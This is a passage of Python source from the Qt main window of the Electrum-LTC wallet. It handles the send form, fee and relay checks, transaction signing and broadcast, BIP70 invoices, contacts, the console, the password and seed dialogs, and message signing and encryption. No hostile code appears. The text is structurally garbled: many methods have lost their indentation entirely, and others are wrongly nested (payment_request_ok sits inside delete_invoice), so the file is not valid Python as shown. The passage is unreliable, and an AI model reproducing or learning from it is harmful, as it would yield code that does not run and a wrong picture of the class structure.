    """Collect (outputs, fee_estimator, label, coins) from the Send form."""
    label = self.message_e.text()
    if self.payment_request:
        # A loaded BIP70 request dictates the outputs.
        outputs = self.payment_request.get_outputs()
    else:
        outputs = self.payto_e.get_outputs(self.max_button.isChecked())
    return outputs, self.get_send_fee_estimator(), label, self.get_coins()
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
    """Returns whether there are errors with outputs.
    Also shows error dialog to user if so.
    """
    pr = self.payment_request
    if pr:
        if pr.has_expired():
            self.show_error(_('Payment request has expired'))
            return True
    if not pr:
        # Free-form Pay-To input: validate line parsing and alias resolution.
        errors = self.payto_e.get_errors()
        if errors:
            self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
            return True
        if self.payto_e.is_alias and self.payto_e.validated is False:
            # Alias resolved but could not be DNSSEC-validated; ask to proceed.
            alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "{}" could not be validated via an additional '
                    'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
            msg += _('Do you wish to continue?')
            if not self.question(msg):
                return True
    if not outputs:
        self.show_error(_('No outputs'))
        return True
    # Per-output sanity checks: address present and valid, amount present.
    for o in outputs:
        if o.address is None:
            self.show_error(_('Litecoin Address is None'))
            return True
        if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
            self.show_error(_('Invalid Litecoin Address'))
            return True
        if o.value is None:
            self.show_error(_('Invalid Amount'))
            return True
    return False  # no errors
def do_preview(self):
    """Show the transaction-details dialog instead of signing/broadcasting."""
    self.do_send(preview = True)
def do_send(self, preview = False):
    """Build, confirm, sign and broadcast the transaction from the Send form.

    With preview=True, stops after showing the transaction dialog.
    """
    if run_hook('abort_send', self):  # plugins may veto sending
        return
    outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
    if self.check_send_tab_outputs_and_show_errors(outputs):
        return
    try:
        is_sweep = bool(self.tx_external_keypairs)
        tx = self.wallet.make_unsigned_transaction(
            coins, outputs, self.config, fixed_fee=fee_estimator,
            is_sweep=is_sweep)
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        self.show_message(str(e))
        return
    except InternalAddressCorruption as e:
        # Serious wallet corruption: show it AND re-raise so it is reported.
        self.show_error(str(e))
        raise
    except BaseException as e:
        self.logger.exception('')
        self.show_message(str(e))
        return
    amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
    fee = tx.get_fee()
    use_rbf = bool(self.config.get('use_rbf', True))
    if use_rbf:
        tx.set_rbf(True)
    # Refuse fees below the server's relay fee: such a tx would not propagate.
    if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
        self.show_error('\n'.join([
            _("This transaction requires a higher fee, or it will not be propagated by your current server"),
            _("Try to raise your transaction fee, or use a server with a lower relay fee.")
        ]))
        return
    if preview:
        self.show_transaction(tx, tx_desc)
        return
    if not self.network:
        self.show_error(_("You can't broadcast a transaction without a live network connection."))
        return
    # confirmation dialog
    msg = [
        _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
        _("Mining fee") + ": " + self.format_amount_and_units(fee),
    ]
    x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
    if x_fee:
        x_fee_address, x_fee_amount = x_fee
        msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
    feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
    if fee > feerate_warning * tx.estimated_size() / 1000:
        msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
    if self.wallet.has_keystore_encryption():
        # Password prompt doubles as the confirmation dialog.
        msg.append("")
        msg.append(_("Enter your password to proceed"))
        password = self.password_dialog('\n'.join(msg))
        if not password:
            return
    else:
        msg.append(_('Proceed?'))
        password = None
        if not self.question('\n'.join(msg)):
            return
    def sign_done(success):
        if success:
            if not tx.is_complete():
                # Partially signed (e.g. multisig): show it for further co-signing.
                self.show_transaction(tx)
                self.do_clear()
            else:
                self.broadcast_transaction(tx, tx_desc)
    self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
    """Sign *tx*; the password is obtained by the @protected wrapper."""
    self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
    '''Sign the transaction in a separate thread. When done, calls
    the callback with a success code of True or False.
    '''
    def on_success(result):
        callback(True)
    def on_failure(exc_info):
        self.on_error(exc_info)
        callback(False)
    # Plugins (e.g. 2FA) may wrap the success path.
    on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
    if self.tx_external_keypairs:
        # can sign directly
        task = partial(Transaction.sign, tx, self.tx_external_keypairs)
    else:
        task = partial(self.wallet.sign_transaction, tx, password)
    WaitingDialog(self, _('Signing transaction...'), task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
    """Broadcast *tx* on a worker thread and report the outcome in the GUI."""
    def broadcast_thread():
        # non-GUI thread
        pr = self.payment_request
        if pr and pr.has_expired():
            self.payment_request = None
            return False, _("Payment request has expired")
        status = False
        try:
            self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
        except TxBroadcastError as e:
            msg = e.get_message_for_gui()
        except BestEffortRequestFailed as e:
            msg = repr(e)
        else:
            status, msg = True, tx.txid()
        if pr and status is True:
            # BIP70 flow: mark the invoice paid and send the payment ACK.
            self.invoices.set_paid(pr, tx.txid())
            self.invoices.save()
            self.payment_request = None
            refund_address = self.wallet.get_receiving_address()
            coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
            fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
            ack_status, ack_msg = fut.result(timeout=20)
            self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
        return status, msg
    # Capture current TL window; override might be removed on return
    parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
    def broadcast_done(result):
        # GUI thread
        if result:
            status, msg = result
            if status:
                # On success msg is the txid; label it and reset the form.
                if tx_desc is not None and tx.is_complete():
                    self.wallet.set_label(tx.txid(), tx_desc)
                parent.show_message(_('Payment sent.') + '\n' + msg)
                self.invoice_list.update()
                self.do_clear()
            else:
                msg = msg or ''
                parent.show_error(msg)
    WaitingDialog(self, _('Broadcasting transaction...'),
                  broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
    """Modal radio-choice dialog; returns the selected index, or None if cancelled.

    Needed by QtHandler for hardware wallets.
    """
    dialog = WindowModalDialog(self.top_level_window())
    choice_layout = ChoicesLayout(msg, choices)
    vbox = QVBoxLayout(dialog)
    vbox.addLayout(choice_layout.layout())
    vbox.addLayout(Buttons(OkButton(dialog)))
    if dialog.exec_():
        return choice_layout.selected_index()
    return None
def lock_amount(self, b):
    """Freeze (b truthy) or unfreeze the amount field; Max is disabled while frozen."""
    self.amount_e.setFrozen(b)
    self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
    """Put the Send tab into payment-request mode while the request is being fetched."""
    self.show_send_tab()
    self.payto_e.is_pr = True
    for field in (self.payto_e, self.message_e):
        field.setFrozen(True)
    self.lock_amount(True)
    self.payto_e.setText(_("please wait..."))
    return True
def delete_invoice(self, key):
    """Remove invoice *key* from the store and refresh the invoice list."""
    self.invoices.remove(key)
    self.invoice_list.update()
    def payment_request_ok(self):
        """Handle a successfully verified BIP70 payment request.

        Registers it as an invoice and populates the send tab from it,
        unless the invoice has already been paid.
        """
        pr = self.payment_request
        if not pr:
            return
        key = self.invoices.add(pr)
        status = self.invoices.get_status(key)
        self.invoice_list.update()
        if status == PR_PAID:
            self.show_message("invoice already paid")
            self.do_clear()
            self.payment_request = None
            return
        self.payto_e.is_pr = True
        # Colour the payee field according to whether the request is still valid.
        if not pr.has_expired():
            self.payto_e.setGreen()
        else:
            self.payto_e.setExpired()
        self.payto_e.setText(pr.get_requestor())
        self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
        self.message_e.setText(pr.get_memo())
        # signal to set fee
        self.amount_e.textEdited.emit("")
    def payment_request_error(self):
        """Show the error from a failed BIP70 payment request and reset the send tab."""
        pr = self.payment_request
        if not pr:
            return
        self.show_message(pr.error)
        self.payment_request = None
        self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
    def pay_to_URI(self, URI):
        """Populate the send tab from a BIP21 'litecoin:' URI.

        If the URI carries a payment-request URL ('r') or a signed request
        ('name' + 'sig'), the request is fetched asynchronously and handled
        via on_pr; otherwise address/amount/message fields are filled in
        directly.
        """
        if not URI:
            return
        try:
            out = util.parse_URI(URI, self.on_pr)
        except InvalidBitcoinURI as e:
            self.show_error(_("Error parsing URI") + f":\n{e}")
            return
        self.show_send_tab()
        r = out.get('r')
        sig = out.get('sig')
        name = out.get('name')
        if r or (name and sig):
            # BIP70/BIP72 payment request: fields are filled in once fetched.
            self.prepare_for_payment_request()
            return
        address = out.get('address')
        amount = out.get('amount')
        label = out.get('label')
        message = out.get('message')
        # use label as description (not BIP21 compliant)
        if label and not message:
            message = label
        if address:
            self.payto_e.setText(address)
        if message:
            self.message_e.setText(message)
        if amount:
            self.amount_e.setAmount(amount)
            self.amount_e.textEdited.emit("")
    def do_clear(self):
        """Reset the send tab to its pristine state: clear and unfreeze all
        fields, reset fee controls and coin selection, drop any pending
        payment request."""
        self.max_button.setChecked(False)
        self.not_enough_funds = False
        self.payment_request = None
        self.payto_e.is_pr = False
        for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
                  self.fee_e, self.feerate_e]:
            e.setText('')
            e.setFrozen(False)
        self.fee_slider.activate()
        self.feerate_e.setAmount(self.config.fee_per_byte())
        self.size_e.setAmount(0)
        self.feerounding_icon.setVisible(False)
        self.set_pay_from([])
        self.tx_external_keypairs = {}
        self.update_status()
        # allow plugins to reset their own send-tab state
        run_hook('do_clear', self)
    def set_frozen_state_of_addresses(self, addrs, freeze: bool):
        """Freeze or unfreeze the given addresses and refresh affected views."""
        self.wallet.set_frozen_state_of_addresses(addrs, freeze)
        self.address_list.update()
        self.utxo_list.update()
        # frozen coins change what is spendable, hence the fee estimate
        self.update_fee()
    def set_frozen_state_of_coins(self, utxos, freeze: bool):
        """Freeze or unfreeze the given UTXOs and refresh affected views."""
        self.wallet.set_frozen_state_of_coins(utxos, freeze)
        self.utxo_list.update()
        # frozen coins change what is spendable, hence the fee estimate
        self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
    def create_utxo_tab(self):
        """Build the Coins (UTXO) tab."""
        from .utxo_list import UTXOList
        self.utxo_list = l = UTXOList(self)
        return self.create_list_tab(l)
    def create_contacts_tab(self):
        """Build the Contacts tab."""
        from .contact_list import ContactList
        self.contact_list = l = ContactList(self)
        return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
    def spend_coins(self, coins):
        """Restrict spending to *coins* and bring up the send tab."""
        self.set_pay_from(coins)
        self.show_send_tab()
        self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
    def show_invoice(self, key):
        """Display details of invoice *key*, re-verifying its signature first."""
        pr = self.invoices.get(key)
        if pr is None:
            self.show_error('Cannot find payment request in wallet.')
            return
        # refresh the verify status shown in the details dialog
        pr.verify(self.contacts)
        self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
    def do_pay_invoice(self, key):
        """Load invoice *key* into the send tab after re-verifying it."""
        pr = self.invoices.get(key)
        self.payment_request = pr
        self.prepare_for_payment_request()
        pr.error = None  # this forces verify() to re-run
        if pr.verify(self.contacts):
            self.payment_request_ok()
        else:
            self.payment_request_error()
    def create_console_tab(self):
        """Build the Console tab widget."""
        from .console import Console
        self.console = console = Console()
        return console
    def update_console(self):
        """Refresh the console namespace: wallet/network objects plus a
        wrapper function for every public command."""
        console = self.console
        console.history = self.config.get("console-history",[])
        console.history_index = len(console.history)
        console.updateNamespace({
            'wallet': self.wallet,
            'network': self.network,
            'plugins': self.gui_object.plugins,
            'window': self,
            'config': self.config,
            'electrum': electrum,
            'daemon': self.gui_object.daemon,
            'util': util,
            'bitcoin': bitcoin,
        })
        c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
        methods = {}
        def mkfunc(f, method):
            # Bind *method* now: a closure over the bare loop variable would
            # capture only its final value (late binding).
            return lambda *args, **kwargs: f(method, args, self.password_dialog, **kwargs)
        for m in dir(c):
            if m[0]=='_' or m in ['network','wallet','config']: continue
            methods[m] = mkfunc(c._run, m)
        console.updateNamespace(methods)
    def create_status_bar(self):
        """Build the window status bar: balance label, (hidden) search box,
        (hidden) update-check button, and password/preferences/seed/network
        buttons."""
        sb = QStatusBar()
        sb.setFixedHeight(35)
        self.balance_label = QLabel("Loading wallet...")
        self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addWidget(self.balance_label)
        # Search box: hidden until the user toggles it (see toggle_search).
        self.search_box = QLineEdit()
        self.search_box.textChanged.connect(self.do_search)
        self.search_box.hide()
        sb.addPermanentWidget(self.search_box)
        # Update-check button: hidden until an update notification arrives.
        self.update_check_button = QPushButton("")
        self.update_check_button.setFlat(True)
        self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
        self.update_check_button.setIcon(read_QIcon("update.png"))
        self.update_check_button.hide()
        sb.addPermanentWidget(self.update_check_button)
        self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
        sb.addPermanentWidget(self.password_button)
        sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
        self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
        sb.addPermanentWidget(self.seed_button)
        self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
        sb.addPermanentWidget(self.status_button)
        # allow plugins to add their own status bar widgets
        run_hook('create_status_bar', sb)
        self.setStatusBar(sb)
    def update_lock_icon(self):
        """Set the padlock icon according to whether the wallet has a password."""
        icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
        self.password_button.setIcon(icon)
    def update_buttons_on_seed(self):
        """Show/hide the seed, password and send buttons per wallet capabilities."""
        self.seed_button.setVisible(self.wallet.has_seed())
        self.password_button.setVisible(self.wallet.may_have_password())
        self.send_button.setVisible(not self.wallet.is_watching_only())
    def change_password_dialog(self):
        """Let the user change (or disable) the wallet password.

        Hardware wallets that encrypt storage with an xpub-derived key use a
        dedicated dialog (the device supplies the encryption password);
        software wallets use the standard change-password dialog.
        """
        from electrum_ltc.storage import STO_EV_XPUB_PW
        if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
            from .password_dialog import ChangePasswordDialogForHW
            d = ChangePasswordDialogForHW(self, self.wallet)
            ok, encrypt_file = d.run()
            if not ok:
                return
            try:
                hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
            except UserCancelled:
                return
            except BaseException as e:
                self.logger.exception('')
                self.show_error(repr(e))
                return
            old_password = hw_dev_pw if self.wallet.has_password() else None
            new_password = hw_dev_pw if encrypt_file else None
        else:
            from .password_dialog import ChangePasswordDialogForSW
            d = ChangePasswordDialogForSW(self, self.wallet)
            ok, old_password, new_password, encrypt_file = d.run()
            if not ok:
                return
        try:
            self.wallet.update_password(old_password, new_password, encrypt_file)
        except InvalidPassword as e:
            self.show_error(str(e))
            return
        except BaseException:
            self.logger.exception('Failed to update password')
            self.show_error(_('Failed to update password'))
            return
        msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
        self.show_message(msg, title=_("Success"))
        self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
    def do_search(self, t):
        """Apply filter string *t* to the current tab, if it is searchable."""
        tab = self.tabs.currentWidget()
        if hasattr(tab, 'searchable_list'):
            tab.searchable_list.filter(t)
    def new_contact_dialog(self):
        """Prompt for an address/name pair and add it as a contact."""
        d = WindowModalDialog(self, _("New Contact"))
        vbox = QVBoxLayout(d)
        vbox.addWidget(QLabel(_('New Contact') + ':'))
        grid = QGridLayout()
        line1 = QLineEdit()
        line1.setFixedWidth(32 * char_width_in_lineedit())
        line2 = QLineEdit()
        line2.setFixedWidth(32 * char_width_in_lineedit())
        grid.addWidget(QLabel(_("Address")), 1, 0)
        grid.addWidget(line1, 1, 1)
        grid.addWidget(QLabel(_("Name")), 2, 0)
        grid.addWidget(line2, 2, 1)
        vbox.addLayout(grid)
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if d.exec_():
            # set_contact(label, address): line2 is the name, line1 the address
            self.set_contact(line2.text(), line1.text())
    def show_master_public_keys(self):
        """Show a dialog with wallet metadata and its master public key(s)."""
        dialog = WindowModalDialog(self, _("Wallet Information"))
        dialog.setMinimumSize(500, 100)
        mpk_list = self.wallet.get_master_public_keys()
        vbox = QVBoxLayout()
        wallet_type = self.wallet.storage.get('wallet_type', '')
        if self.wallet.is_watching_only():
            wallet_type += ' [{}]'.format(_('watching-only'))
        seed_available = _('True') if self.wallet.has_seed() else _('False')
        keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
        grid = QGridLayout()
        basename = os.path.basename(self.wallet.storage.path)
        grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
        grid.addWidget(QLabel(basename), 0, 1)
        grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
        grid.addWidget(QLabel(wallet_type), 1, 1)
        grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
        grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
        grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
        grid.addWidget(QLabel(str(seed_available)), 3, 1)
        # a single keystore type fits on one row; multisig shows types per cosigner below
        if len(keystore_types) <= 1:
            grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
            ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
            grid.addWidget(QLabel(ks_type), 4, 1)
        vbox.addLayout(grid)
        if self.wallet.is_deterministic():
            mpk_text = ShowQRTextEdit()
            mpk_text.setMaximumHeight(150)
            mpk_text.addCopyButton(self.app)
            def show_mpk(index):
                mpk_text.setText(mpk_list[index])
                mpk_text.repaint()  # macOS hack for #4777
            # only show the combobox in case multiple accounts are available
            if len(mpk_list) > 1:
                def label(key):
                    if isinstance(self.wallet, Multisig_Wallet):
                        return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
                    return ''
                labels = [label(i) for i in range(len(mpk_list))]
                on_click = lambda clayout: show_mpk(clayout.selected_index())
                labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
                vbox.addLayout(labels_clayout.layout())
            else:
                vbox.addWidget(QLabel(_("Master Public Key")))
            show_mpk(0)
            vbox.addWidget(mpk_text)
        vbox.addStretch(1)
        vbox.addLayout(Buttons(CloseButton(dialog)))
        dialog.setLayout(vbox)
        dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
    @protected
    def _delete_wallet(self, password):
        """Delete the wallet file from disk and close the window.

        Decorated with @protected: the user's password is requested and
        passed in as *password*.
        """
        wallet_path = self.wallet.storage.path
        basename = os.path.basename(wallet_path)
        r = self.gui_object.daemon.delete_wallet(wallet_path)
        self.close()
        if r:
            self.show_error(_("Wallet removed: {}").format(basename))
        else:
            self.show_error(_("Wallet file not found: {}").format(basename))
    @protected
    def show_seed_dialog(self, password):
        """Show the wallet seed words (and passphrase, if any).

        Decorated with @protected: *password* is supplied by the decorator.
        """
        if not self.wallet.has_seed():
            self.show_message(_('This wallet has no seed'))
            return
        keystore = self.wallet.get_keystore()
        try:
            seed = keystore.get_seed(password)
            passphrase = keystore.get_passphrase(password)
        except BaseException as e:
            self.show_error(repr(e))
            return
        from .seed_dialog import SeedDialog
        d = SeedDialog(self, seed, passphrase)
        d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
    @protected
    def show_private_key(self, address, password):
        """Display the private key (and redeem script, if any) for *address*.

        Decorated with @protected: *password* is supplied by the decorator.
        """
        if not address:
            return
        try:
            pk, redeem_script = self.wallet.export_private_key(address, password)
        except Exception as e:
            self.logger.exception('')
            self.show_message(repr(e))
            return
        xtype = bitcoin.deserialize_privkey(pk)[0]
        d = WindowModalDialog(self, _("Private key"))
        d.setMinimumSize(600, 150)
        vbox = QVBoxLayout()
        vbox.addWidget(QLabel(_("Address") + ': ' + address))
        vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
        vbox.addWidget(QLabel(_("Private key") + ':'))
        keys_e = ShowQRTextEdit(text=pk)
        keys_e.addCopyButton(self.app)
        vbox.addWidget(keys_e)
        if redeem_script:
            vbox.addWidget(QLabel(_("Redeem Script") + ':'))
            rds_e = ShowQRTextEdit(text=redeem_script)
            rds_e.addCopyButton(self.app)
            vbox.addWidget(rds_e)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.setLayout(vbox)
        d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
    @protected
    def do_sign(self, address, message, signature, password):
        """Sign *message* with the key for *address*; the base64 signature is
        written into the *signature* widget.

        The widget arguments are Qt text fields; signing runs on the wallet's
        worker thread. Decorated with @protected: *password* is supplied by
        the decorator.
        """
        address = address.text().strip()
        message = message.toPlainText().strip()
        if not bitcoin.is_address(address):
            self.show_message(_('Invalid Litecoin address.'))
            return
        if self.wallet.is_watching_only():
            self.show_message(_('This is a watching-only wallet.'))
            return
        if not self.wallet.is_mine(address):
            self.show_message(_('Address not in wallet.'))
            return
        txin_type = self.wallet.get_txin_type(address)
        # message signing is only defined for single-key address types
        if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
            self.show_message(_('Cannot sign messages with this type of address:') + \
                              ' ' + txin_type + '\n\n' + self.msg_sign)
            return
        task = partial(self.wallet.sign_message, address, message, password)
        def show_signed_message(sig):
            try:
                signature.setText(base64.b64encode(sig).decode('ascii'))
            except RuntimeError:
                # (signature) wrapped C/C++ object has been deleted
                pass
        self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
    def sign_verify_message(self, address=''):
        """Open the Sign/verify Message dialog, optionally prefilled with *address*."""
        d = WindowModalDialog(self, _('Sign/verify Message'))
        d.setMinimumSize(610, 290)
        layout = QGridLayout(d)
        message_e = QTextEdit()
        message_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Message')), 1, 0)
        layout.addWidget(message_e, 1, 1)
        layout.setRowStretch(2,3)
        address_e = QLineEdit()
        address_e.setText(address)
        layout.addWidget(QLabel(_('Address')), 2, 0)
        layout.addWidget(address_e, 2, 1)
        signature_e = QTextEdit()
        signature_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Signature')), 3, 0)
        layout.addWidget(signature_e, 3, 1)
        layout.setRowStretch(3,1)
        hbox = QHBoxLayout()
        b = QPushButton(_("Sign"))
        b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
        hbox.addWidget(b)
        b = QPushButton(_("Verify"))
        b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
        hbox.addWidget(b)
        b = QPushButton(_("Close"))
        b.clicked.connect(d.accept)
        hbox.addWidget(b)
        layout.addLayout(hbox, 4, 1)
        d.exec_()
    @protected
    def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
        """Decrypt the ciphertext in *encrypted_e* with the wallet key for the
        pubkey in *pubkey_e*; the plaintext goes into *message_e*.

        Runs on the wallet's worker thread. Decorated with @protected:
        *password* is supplied by the decorator.
        """
        if self.wallet.is_watching_only():
            self.show_message(_('This is a watching-only wallet.'))
            return
        cyphertext = encrypted_e.toPlainText()
        task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
        def setText(text):
            try:
                message_e.setText(text.decode('utf-8'))
            except RuntimeError:
                # (message_e) wrapped C/C++ object has been deleted
                pass
        self.wallet.thread.add(task, on_success=setText)
    def do_encrypt(self, message_e, pubkey_e, encrypted_e):
        """Encrypt the message in *message_e* for the public key in *pubkey_e*;
        the ascii ciphertext goes into *encrypted_e*."""
        message = message_e.toPlainText()
        message = message.encode('utf-8')
        try:
            public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
        except BaseException as e:
            self.logger.exception('Invalid Public key')
            self.show_warning(_('Invalid Public key'))
            return
        encrypted = public_key.encrypt_message(message)
        encrypted_e.setText(encrypted.decode('ascii'))
    def encrypt_message(self, address=''):
        """Open the Encrypt/decrypt Message dialog; if *address* is given,
        prefill the pubkey field with that address's public key."""
        d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
        d.setMinimumSize(610, 490)
        layout = QGridLayout(d)
        message_e = QTextEdit()
        message_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Message')), 1, 0)
        layout.addWidget(message_e, 1, 1)
        layout.setRowStretch(2,3)
        pubkey_e = QLineEdit()
        if address:
            pubkey = self.wallet.get_public_key(address)
            pubkey_e.setText(pubkey)
        layout.addWidget(QLabel(_('Public key')), 2, 0)
        layout.addWidget(pubkey_e, 2, 1)
        encrypted_e = QTextEdit()
        encrypted_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Encrypted')), 3, 0)
        layout.addWidget(encrypted_e, 3, 1)
        layout.setRowStretch(3,1)
        hbox = QHBoxLayout()
        b = QPushButton(_("Encrypt"))
        b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
        hbox.addWidget(b)
        b = QPushButton(_("Decrypt"))
        b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
        hbox.addWidget(b)
        b = QPushButton(_("Close"))
        b.clicked.connect(d.accept)
